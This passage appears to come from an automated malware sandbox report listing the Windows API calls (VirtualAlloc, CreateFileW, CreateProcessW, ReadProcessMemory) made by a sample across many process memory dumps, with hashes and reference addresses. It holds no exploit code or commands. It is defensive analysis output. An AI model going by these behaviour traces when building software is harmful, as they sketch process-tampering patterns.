                              • Instruction Fuzzy Hash: 98A104B0D00209EFDF15CFE4C945BEDBBB2AF08315F20846AE615BA290DB755A90EF54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateProcessW.KERNEL32(?,00000000), ref: 0204058C
                              • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 020405D3
                              • TerminateProcess.KERNEL32(00000000,00000000,?), ref: 020408ED
                              Memory Dump Source
                              • Source File: 00000006.00000002.2176024110.0000000002040000.00000040.00000001.sdmp, Offset: 02040000, based on PE: false
                              Similarity
                              • API ID: Process$CreateMemoryReadTerminate
                              • String ID:
                              • API String ID: 2831168122-0
                              • Opcode ID: 1173e1a1515639f33f18dee929500074aed42dca2b485f697ed25000c0d3acd0
                              • Instruction ID: 87f23b2ea504b63dea5a7e928141831a7711b69bcd827c44aad53bf8f21ddac2
                              • Opcode Fuzzy Hash: 1173e1a1515639f33f18dee929500074aed42dca2b485f697ed25000c0d3acd0
                              • Instruction Fuzzy Hash: 52523C75E50358AEEB64CB94EC55BFDB7B1AF48700F10849AE608FA2A0D7705E80EF45
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Non-executed Functions

                              Executed Functions

                              APIs
                              • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 01E41739
                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01E4179B
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.2190237575.0000000001E40000.00000040.00000001.sdmp, Offset: 01E40000, based on PE: false
                              Similarity
                              • API ID: AllocCreateFileVirtual
                              • String ID: 5cd4190b0f424c1ba550357b44f5a494
                              • API String ID: 1475775534-4174767169
                              • Opcode ID: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
                              • Instruction ID: e216dc9f8afb23e2a2f3890e81e40fc568f0e13655ed2151eaf2ca3bfc8f5b03
                              • Opcode Fuzzy Hash: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
                              • Instruction Fuzzy Hash: 9AE15921D44388EEEF21CBE4EC15BEDBBB5AF04B00F10509AE648FA1D1D7B11A84DB16
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 01E40A20
                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 01E40BED
                              Memory Dump Source
                              • Source File: 00000008.00000002.2190237575.0000000001E40000.00000040.00000001.sdmp, Offset: 01E40000, based on PE: false
                              Similarity
                              • API ID: CreateFileFreeVirtual
                              • String ID:
                              • API String ID: 204039940-0
                              • Opcode ID: 39fd92495d807123e8d317974e5c9ea65eb60508606e6e94cb9b6630f1585058
                              • Instruction ID: 66851e2bf9c19c2a5fe5540fd91607ec93ea5fec66828fbf9b061c436cb76362
                              • Opcode Fuzzy Hash: 39fd92495d807123e8d317974e5c9ea65eb60508606e6e94cb9b6630f1585058
                              • Instruction Fuzzy Hash: 37A10235D00209EFDF11CFE4E985BEDBBB1BF08319F20956AE615BA2A0D3745A80DB14
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateProcessW.KERNEL32(?,00000000), ref: 01E4058C
                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01E405D3
                              • TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 01E408ED
                              Memory Dump Source
                              • Source File: 00000008.00000002.2190237575.0000000001E40000.00000040.00000001.sdmp, Offset: 01E40000, based on PE: false
                              Similarity
                              • API ID: Process$CreateMemoryReadTerminate
                              • String ID:
                              • API String ID: 2831168122-0
                              • Opcode ID: a5794989a2d6d102f833e7dcfb1e692e285d864809b5cc7d8936d7993d06b28e
                              • Instruction ID: a9d2e4a17189c785948688d0413ae35a8767c802c45b6656c66e02dc9d70840f
                              • Opcode Fuzzy Hash: a5794989a2d6d102f833e7dcfb1e692e285d864809b5cc7d8936d7993d06b28e
                              • Instruction Fuzzy Hash: 07523B35E50258EEEB60CBA8ED55BFDB7B5AF48700F205496E608FA2A0D3705E80DF45
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Non-executed Functions

                              Executed Functions

                              APIs
                              • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 00581739
                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0058179B
                              Strings
                              Memory Dump Source
                              • Source File: 0000000A.00000002.2201211568.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                              Similarity
                              • API ID: AllocCreateFileVirtual
                              • String ID: 5cd4190b0f424c1ba550357b44f5a494
                              • API String ID: 1475775534-4174767169
                              • Opcode ID: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
                              • Instruction ID: 87e9637b45a403ecd94b27f7eb38269f626c8d2b264ed068c91a30358f09e916
                              • Opcode Fuzzy Hash: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
                              • Instruction Fuzzy Hash: 0AE15B21E44388EDEF21DBE4DC16BEDBBB5AF04710F10409AE648FA1D1D7B10A85DB1A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 00580A20
                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 00580BED
                              Memory Dump Source
                              • Source File: 0000000A.00000002.2201211568.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                              Similarity
                              • API ID: CreateFileFreeVirtual
                              • String ID:
                              • API String ID: 204039940-0
                              • Opcode ID: 39fd92495d807123e8d317974e5c9ea65eb60508606e6e94cb9b6630f1585058
                              • Instruction ID: 74c8dc206743834d064a469e8b11607ab58004a3be69946e6c946ec260ff5da6
                              • Opcode Fuzzy Hash: 39fd92495d807123e8d317974e5c9ea65eb60508606e6e94cb9b6630f1585058
                              • Instruction Fuzzy Hash: 6BA1F130D00209EFDF50EFE4C989BADBBB1BF08316F20945AE915BA2A0D7755A85DB14
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateProcessW.KERNEL32(?,00000000), ref: 0058058C
                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 005805D3
                              • TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 005808ED
                              Memory Dump Source
                              • Source File: 0000000A.00000002.2201211568.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                              Similarity
                              • API ID: Process$CreateMemoryReadTerminate
                              • String ID:
                              • API String ID: 2831168122-0
                              • Opcode ID: 1173e1a1515639f33f18dee929500074aed42dca2b485f697ed25000c0d3acd0
                              • Instruction ID: 4942563257b3b0f27f159b11ec7052a02bdecbc422689a9255af86412bc56de9
                              • Opcode Fuzzy Hash: 1173e1a1515639f33f18dee929500074aed42dca2b485f697ed25000c0d3acd0
                              • Instruction Fuzzy Hash: 29521835A50258AEEB60DB94EC55BFDBBB4BF48700F205496EA08FA2E0D3705E84DF45
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Non-executed Functions

                              Executed Functions

                              APIs
                              • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 00431739
                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0043179B
                              Strings
                              Memory Dump Source
                              • Source File: 0000000C.00000002.2216292264.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false
                              Similarity
                              • API ID: AllocCreateFileVirtual
                              • String ID: 5cd4190b0f424c1ba550357b44f5a494
                              • API String ID: 1475775534-4174767169
                              • Opcode ID: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
                              • Instruction ID: 2fb7317618ca62271da53b771e16b1af27a675a5e0a7b0044d91730c422f3827
                              • Opcode Fuzzy Hash: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
                              • Instruction Fuzzy Hash: 33E16F20D44388EDEF21DBE4DC16BEDBBB5AF08714F10509AE648FA1E1D7B50A84DB19
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 00430A20
                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 00430BED
                              Memory Dump Source
                              • Source File: 0000000C.00000002.2216292264.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false
                              Similarity
                              • API ID: CreateFileFreeVirtual
                              • String ID:
                              • API String ID: 204039940-0
                              • Opcode ID: 39fd92495d807123e8d317974e5c9ea65eb60508606e6e94cb9b6630f1585058
                              • Instruction ID: 7c7dafa2befd4de379dd934a6a8f9eb1dd0293695ed858227d0316826f94d13b
                              • Opcode Fuzzy Hash: 39fd92495d807123e8d317974e5c9ea65eb60508606e6e94cb9b6630f1585058
                              • Instruction Fuzzy Hash: E4A10170D00209EFDF10DFE4D895BADFBB1AF08315F20955AE515BA2A0D3789A41DF19
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateProcessW.KERNEL32(?,00000000), ref: 0043058C
                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 004305D3
                              • TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 004308ED
                              Memory Dump Source
                              • Source File: 0000000C.00000002.2216292264.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false
                              Similarity
                              • API ID: Process$CreateMemoryReadTerminate
                              • String ID:
                              • API String ID: 2831168122-0
                              • Opcode ID: 1173e1a1515639f33f18dee929500074aed42dca2b485f697ed25000c0d3acd0
                              • Instruction ID: badc0c7138c6de790abd3abee7eb1e5aeeb9a9fca14e621c565508c0a416f454
                              • Opcode Fuzzy Hash: 1173e1a1515639f33f18dee929500074aed42dca2b485f697ed25000c0d3acd0
                              • Instruction Fuzzy Hash: E9523C35E50258EEEB64CB94EC55BFDB7B4AF48700F20559AE608FA2A0D3745E80DF09
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Non-executed Functions

                              Executed Functions

                              APIs
                              • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 02741739
                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0274179B
                              Strings
                              Memory Dump Source
                              • Source File: 0000000E.00000002.2231416186.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                              Similarity
                              • API ID: AllocCreateFileVirtual
                              • String ID: 5cd4190b0f424c1ba550357b44f5a494
                              • API String ID: 1475775534-4174767169
                              • Opcode ID: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
                              • Instruction ID: 341d77f6bbd0c1c7f94fd19cd12bb1578dd58e3218962fe64a5bae5523152b0e
                              • Opcode Fuzzy Hash: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
                              • Instruction Fuzzy Hash: A6E15A21E54388EEEF21DBE4DC15BEDBBB5AF04B10F50409AE648FA1D1D7B10A84DB16
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 02740A20
                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 02740BED
                              Memory Dump Source
                              • Source File: 0000000E.00000002.2231416186.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                              Similarity
                              • API ID: CreateFileFreeVirtual
                              • String ID:
                              • API String ID: 204039940-0
                              • Opcode ID: 39fd92495d807123e8d317974e5c9ea65eb60508606e6e94cb9b6630f1585058
                              • Instruction ID: f256c6719d2bd5fc13f360b4c89982c299eb5ffa0cad11feec14bc9ff737db99
                              • Opcode Fuzzy Hash: 39fd92495d807123e8d317974e5c9ea65eb60508606e6e94cb9b6630f1585058
                              • Instruction Fuzzy Hash: 20A1E331E00209EFDF15DFE4C989BADBBB1BF08315F20845AE615BA2A0DB755A90DF14
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateProcessW.KERNEL32(?,00000000), ref: 0274058C
                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 027405D3
                              • TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 027408ED
                              Memory Dump Source
                              • Source File: 0000000E.00000002.2231416186.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                              Similarity
                              • API ID: Process$CreateMemoryReadTerminate
                              • String ID:
                              • API String ID: 2831168122-0
                              • Opcode ID: 1173e1a1515639f33f18dee929500074aed42dca2b485f697ed25000c0d3acd0
                              • Instruction ID: 586f5652b4bc527dd74aa0c7a081951e1dbe09029706f17ed2024eca88b7ff7c
                              • Opcode Fuzzy Hash: 1173e1a1515639f33f18dee929500074aed42dca2b485f697ed25000c0d3acd0
                              • Instruction Fuzzy Hash: 48523A35E50258EEEB64CBA4EC55BFDB7B5AF48700F20449AE618FA2A0D7705E80DF05
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Non-executed Functions

                              Executed Functions

                              APIs
                              • VirtualAlloc.KERNEL32(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 005D1739
                              • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 005D179B
                              Strings
                              Memory Dump Source
                              • Source File: 00000010.00000002.2243292101.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                              Similarity
                              • API ID: AllocCreateFileVirtual
                              • String ID: 5cd4190b0f424c1ba550357b44f5a494
                              • API String ID: 1475775534-4174767169
                              • Opcode ID: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
                              • Instruction ID: 571cc0b9927fef25adf8f2f22fd61e8a6537e9accac99f28de6a37710b63dc27
                              • Opcode Fuzzy Hash: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
                              • Instruction Fuzzy Hash: B6E14A21D44388EDEB21CBE4DC16BEDBBB5AF04710F10449BE648FA2D1D7B10A84DB1A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 005D0A20
                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 005D0BED
                              Memory Dump Source
                              • Source File: 00000010.00000002.2243292101.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                              Similarity
                              • API ID: CreateFileFreeVirtual
                              • String ID:
                              • API String ID: 204039940-0
                              • Opcode ID: 39fd92495d807123e8d317974e5c9ea65eb60508606e6e94cb9b6630f1585058
                              • Instruction ID: b54e346e434d4255f6d24acfeb68b79a7cb2182b5b3d01ff65ac142f769507e3
                              • Opcode Fuzzy Hash: 39fd92495d807123e8d317974e5c9ea65eb60508606e6e94cb9b6630f1585058
                              • Instruction Fuzzy Hash: B6A1F130D04209EFEF20CFE8C999BADBBB1BF08315F20945BE515BA2A0D7755A80DB14
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateProcessW.KERNEL32(?,00000000), ref: 005D058C
                              • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 005D05D3
                              • TerminateProcess.KERNEL32(00000000,00000000,?), ref: 005D08ED
                              Memory Dump Source
                              • Source File: 00000010.00000002.2243292101.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                              Similarity
                              • API ID: Process$CreateMemoryReadTerminate
                              • String ID:
                              • API String ID: 2831168122-0
                              • Opcode ID: 1173e1a1515639f33f18dee929500074aed42dca2b485f697ed25000c0d3acd0
                              • Instruction ID: 188dbf03a6e4cc5a4b61254165a7b887946ad7c18a5239b6c2a0653f4130f69e
                              • Opcode Fuzzy Hash: 1173e1a1515639f33f18dee929500074aed42dca2b485f697ed25000c0d3acd0
                              • Instruction Fuzzy Hash: 8E521935A50258AEEB60CB98EC55BFDBBB5BF48700F205497E608FA2E0D3705E80DB55
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Non-executed Functions

                              Executed Functions

                              APIs
                              • VirtualAlloc.KERNEL32(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 00531739
                              • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0053179B
                              Strings
                              Memory Dump Source
                              • Source File: 00000012.00000002.2258051711.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                              Similarity
                              • API ID: AllocCreateFileVirtual
                              • String ID: 5cd4190b0f424c1ba550357b44f5a494
                              • API String ID: 1475775534-4174767169
                              • Opcode ID: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
                              • Instruction ID: 34cb6c0dd284b37cb4f1fc53ce4e5733327506f75ee58b395a78dd07740ddd47
                              • Opcode Fuzzy Hash: aadeebf3583a9c1a2246f2852ff14bfb9d801c7c3db531d9081f9158973a0633
                              • Instruction Fuzzy Hash: 0AE15921D54388EDEF21CBE4DC16BEDBBB5AF04B10F10449AE648FA1D1D7B10A84DB1A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 00530A20
                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 00530BED
                              Memory Dump Source
                              • Source File: 00000012.00000002.2258051711.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                              Similarity
                              • API ID: CreateFileFreeVirtual
                              • String ID:
                              • API String ID: 204039940-0
                              • Opcode ID: 39fd92495d807123e8d317974e5c9ea65eb60508606e6e94cb9b6630f1585058
                              • Instruction ID: 4b3e42ac7be2bfad01474fae53fbe0260b5478fd9471723589ae76daa011b707
                              • Opcode Fuzzy Hash: 39fd92495d807123e8d317974e5c9ea65eb60508606e6e94cb9b6630f1585058
                              • Instruction Fuzzy Hash: F1A1FF31D00209EFDF10CFE4D9A9BADFBB1BF08315F20949AE515BA2A0D7759A90DB14
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateProcessW.KERNEL32(?,00000000), ref: 0053058C
                              • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 005305D3
                              • TerminateProcess.KERNEL32(00000000,00000000,?), ref: 005308ED
                              Memory Dump Source
                              • Source File: 00000012.00000002.2258051711.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                              Similarity
                              • API ID: Process$CreateMemoryReadTerminate
                              • String ID:
                              • API String ID: 2831168122-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Non-executed Functions

                              Executed Functions

                              APIs
                              • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 01F01739
                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01F0179B
                              Strings
                              Memory Dump Source
                              • Source File: 00000014.00000002.2272642125.0000000001F00000.00000040.00000001.sdmp, Offset: 01F00000, based on PE: false
                              Similarity
                              • API ID: AllocCreateFileVirtual
                              • String ID: 5cd4190b0f424c1ba550357b44f5a494
                              • API String ID: 1475775534-4174767169
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 01F00A20
                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 01F00BED
                              Memory Dump Source
                              • Source File: 00000014.00000002.2272642125.0000000001F00000.00000040.00000001.sdmp, Offset: 01F00000, based on PE: false
                              Similarity
                              • API ID: CreateFileFreeVirtual
                              • String ID:
                              • API String ID: 204039940-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateProcessW.KERNEL32(?,00000000), ref: 01F0058C
                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01F005D3
                              • TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 01F008ED
                              Memory Dump Source
                              • Source File: 00000014.00000002.2272642125.0000000001F00000.00000040.00000001.sdmp, Offset: 01F00000, based on PE: false
                              Similarity
                              • API ID: Process$CreateMemoryReadTerminate
                              • String ID:
                              • API String ID: 2831168122-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Non-executed Functions

                              Executed Functions

                              APIs
                              • VirtualAlloc.KERNEL32(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 01F41739
                              • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01F4179B
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.2286963379.0000000001F40000.00000040.00000001.sdmp, Offset: 01F40000, based on PE: false
                              Similarity
                              • API ID: AllocCreateFileVirtual
                              • String ID: 5cd4190b0f424c1ba550357b44f5a494
                              • API String ID: 1475775534-4174767169
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 01F40A20
                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 01F40BED
                              Memory Dump Source
                              • Source File: 00000016.00000002.2286963379.0000000001F40000.00000040.00000001.sdmp, Offset: 01F40000, based on PE: false
                              Similarity
                              • API ID: CreateFileFreeVirtual
                              • String ID:
                              • API String ID: 204039940-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateProcessW.KERNEL32(?,00000000), ref: 01F4058C
                              • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 01F405D3
                              • TerminateProcess.KERNEL32(00000000,00000000,?), ref: 01F408ED
                              Memory Dump Source
                              • Source File: 00000016.00000002.2286963379.0000000001F40000.00000040.00000001.sdmp, Offset: 01F40000, based on PE: false
                              Similarity
                              • API ID: Process$CreateMemoryReadTerminate
                              • String ID:
                              • API String ID: 2831168122-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Non-executed Functions

                              Executed Functions

                              APIs
                              • VirtualAlloc.KERNEL32(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 00541739
                              • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0054179B
                              Strings
                              Memory Dump Source
                              • Source File: 00000018.00000002.2301735990.0000000000540000.00000040.00000001.sdmp, Offset: 00540000, based on PE: false
                              Similarity
                              • API ID: AllocCreateFileVirtual
                              • String ID: 5cd4190b0f424c1ba550357b44f5a494
                              • API String ID: 1475775534-4174767169
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 00540A20
                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 00540BED
                              Memory Dump Source
                              • Source File: 00000018.00000002.2301735990.0000000000540000.00000040.00000001.sdmp, Offset: 00540000, based on PE: false
                              Similarity
                              • API ID: CreateFileFreeVirtual
                              • String ID:
                              • API String ID: 204039940-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateProcessW.KERNEL32(?,00000000), ref: 0054058C
                              • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 005405D3
                              • TerminateProcess.KERNEL32(00000000,00000000,?), ref: 005408ED
                              Memory Dump Source
                              • Source File: 00000018.00000002.2301735990.0000000000540000.00000040.00000001.sdmp, Offset: 00540000, based on PE: false
                              Similarity
                              • API ID: Process$CreateMemoryReadTerminate
                              • String ID:
                              • API String ID: 2831168122-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Non-executed Functions

                              Executed Functions

                              APIs
                              • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 02741739
                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0274179B
                              Strings
                              Memory Dump Source
                              • Source File: 0000001A.00000002.2315955555.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                              Similarity
                              • API ID: AllocCreateFileVirtual
                              • String ID: 5cd4190b0f424c1ba550357b44f5a494
                              • API String ID: 1475775534-4174767169
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 02740A20
                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 02740BED
                              Memory Dump Source
                              • Source File: 0000001A.00000002.2315955555.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                              Similarity
                              • API ID: CreateFileFreeVirtual
                              • String ID:
                              • API String ID: 204039940-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateProcessW.KERNEL32(?,00000000), ref: 0274058C
                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 027405D3
                              • TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 027408ED
                              Memory Dump Source
                              • Source File: 0000001A.00000002.2315955555.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                              Similarity
                              • API ID: Process$CreateMemoryReadTerminate
                              • String ID:
                              • API String ID: 2831168122-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Non-executed Functions

                              Executed Functions

                              APIs
                              • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 00431739
                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0043179B
                              Strings
                              Memory Dump Source
                              • Source File: 0000001C.00000002.2329417076.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false
                              Similarity
                              • API ID: AllocCreateFileVirtual
                              • String ID: 5cd4190b0f424c1ba550357b44f5a494
                              • API String ID: 1475775534-4174767169
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 00430A20
                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 00430BED
                              Memory Dump Source
                              • Source File: 0000001C.00000002.2329417076.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false
                              Similarity
                              • API ID: CreateFileFreeVirtual
                              • String ID:
                              • API String ID: 204039940-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateProcessW.KERNEL32(?,00000000), ref: 0043058C
                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 004305D3
                              • TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 004308ED
                              Memory Dump Source
                              • Source File: 0000001C.00000002.2329417076.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false
                              Similarity
                              • API ID: Process$CreateMemoryReadTerminate
                              • String ID:
                              • API String ID: 2831168122-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Non-executed Functions

                              Executed Functions

                              APIs
                              • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 02741739
                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0274179B
                              Strings
                              Memory Dump Source
                              • Source File: 0000001E.00000002.2346425073.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                              Similarity
                              • API ID: AllocCreateFileVirtual
                              • String ID: 5cd4190b0f424c1ba550357b44f5a494
                              • API String ID: 1475775534-4174767169
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 02740A20
                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 02740BED
                              Memory Dump Source
                              • Source File: 0000001E.00000002.2346425073.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                              Similarity
                              • API ID: CreateFileFreeVirtual
                              • String ID:
                              • API String ID: 204039940-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateProcessW.KERNEL32(?,00000000), ref: 0274058C
